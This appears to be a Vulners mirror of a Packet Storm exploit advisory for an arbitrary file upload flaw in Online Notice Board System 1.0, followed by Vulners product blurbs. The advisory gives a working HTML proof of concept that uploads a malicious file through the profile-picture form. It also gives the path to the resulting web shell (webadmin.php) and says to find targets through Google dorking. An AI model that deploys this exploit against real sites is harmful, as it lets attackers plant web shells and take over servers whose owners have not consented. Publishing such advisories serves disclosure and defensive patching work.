Lucene search
K

Online Notice Board System 1.0 Arbitrary File Upload

🗓️ 17 Sep 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 227 Views

Online Notice Board System 1.0 Arbitrary File Upload vulnerability in Update Profile Picture for

Code
`=============================================================================================================================================  
| # Title : Online Notice Board System project 1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/php/7394/online-notice-board-system |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Go to the line 10.  
  
[+] Set the target site link Save changes and apply .   
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Update Profile Picture</title>  
</head>  
<body>  
<h2>Update Profile Picture</h2>  
<form action="http://127.0.0.1/Online%20Notice%20Board%20System/user/index.php?page=update_profile_pic" method="POST" enctype="multipart/form-data">  
<!-- File input -->  
<label for="f">Choose a profile picture:</label>  
<input type="file" id="f" name="f" required><br><br>  
  
<!-- Submit button -->  
<input type="submit" name="update" value="Update Profile Picture">  
</form>  
</body>  
</html>  
  
[+] http://127.0.0.1/Online%20Notice%20Board%20System/images/webadmin.php  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation